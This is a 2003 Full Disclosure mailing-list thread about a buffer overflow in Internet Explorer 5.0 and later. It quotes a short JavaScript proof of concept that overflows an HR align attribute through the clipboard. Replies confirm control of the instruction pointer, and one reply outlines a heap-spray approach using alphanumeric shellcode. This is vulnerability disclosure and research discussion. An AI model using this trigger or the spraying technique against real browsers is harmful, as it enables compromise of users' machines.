Full Disclosure mailing list archives
Re: Re: Internet Explorer >=5.0 : Buffer overflow
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Mon, 30 Jun 2003 21:17:06 +0400
Dear SecurITeam BugTraq Monitoring, It could be perfectly easy to exploit this vulnerability with alphanumeric shellcode... There is a lot of appropriate addresses, for example with jmp esp in different libraries (NT4 + IE6): 0x636e6294 0x70286161 0x70286221, etc But _real_ problem is it also does toupper() for all characters. So, 0x63 0x70 etc cannot be used. It's still possible to create shellcode, but I see no way to get control, because we have no appropriate address to overwrite EBP/ESP... So, it's impossible to exploit it in usual way. It's possible to put huge (few megabytes of) shellcode on the heap (just to put it in the clipboard too) and try to get something like jmp 0x20XXXXXX or jmp 0x21XXXXXX in 0x20200000 - 0x60FFFFFF and 0x7B200000 - 0x7FFFFFFF because heap usually allocated somewhere in the end of 0x20XXXXXX it looks possible... That is we can put 8MB of jmp 0x21777777 + 8MB of NOOPs + shellcode into clipboard and overwrite EIP with something like 0x21212121.... But this exploit will work an hour with 100% CPU load because clipboard operations are slow :) Any suggestions? --Wednesday, June 25, 2003, 3:05:20 PM, you wrote to dotslash () snosoft com: SBM> Hi, SBM> I can confirm it under Windows 2000 with IE 5.50.4807.2300 SBM> Full control over the EIP, but the shellcode cannot contain (as it currently SBM> appears) non Alpha Numeric characters, too bad I guess. SBM> Thanks SBM> Noam Rathaus SBM> CTO SBM> Beyond Security Ltd SBM> http://www.SecurITeam.com SBM> http://www.BeyondSecurity.com SBM> ----- Original Message ----- SBM> From: "KF" <dotslash () snosoft com> SBM> To: "Digital Scream" <digitalscream () real xakep ru> SBM> Sent: Monday, June 23, 2003 6:43 PM SBM> Subject: Re: Internet Explorer >=5.0 : Buffer overflow
I can confirm this on Windows XP Professional version 6.0.2800.1106.xpsp2-030422-1633 0x43534c41 refrenced mem at 0x43534c41 -KF Digital Scream wrote:<script> wnd=open("about:blank","",""); wnd.moveTo(screen.Width,screen.Height); WndDoc=wnd.document; WndDoc.open(); WndDoc.clear(); buffer=""; for(i=1;i<=127;i++)buffer+="X"; buffer+="DigitalScream"; WndDoc.write("<HR align='"+buffer+"'>"); WndDoc.execCommand("SelectAll"); WndDoc.execCommand("Copy"); wnd.close(); </script> Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
SBM> _______________________________________________ SBM> Full-Disclosure - We believe in it. SBM> Charter: http://lists.netsys.com/full-disclosure-charter.html -- ~/ZARAZA Âå÷íàÿ ïàìÿòü ñâÿòîìó Ïàòðèêó! (Òâåí) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Internet Explorer >=5.0 : Buffer overflow SecurITeam BugTraq Monitoring (Jun 25)
- Re: Re: Internet Explorer >=5.0 : Buffer overflow Philippe Biondi (Jun 25)
- RE: Re: Internet Explorer >=5.0 : Buffer overflow Rick (Jun 25)
- Re: Re: Internet Explorer >=5.0 : Buffer overflow 3APA3A (Jun 30)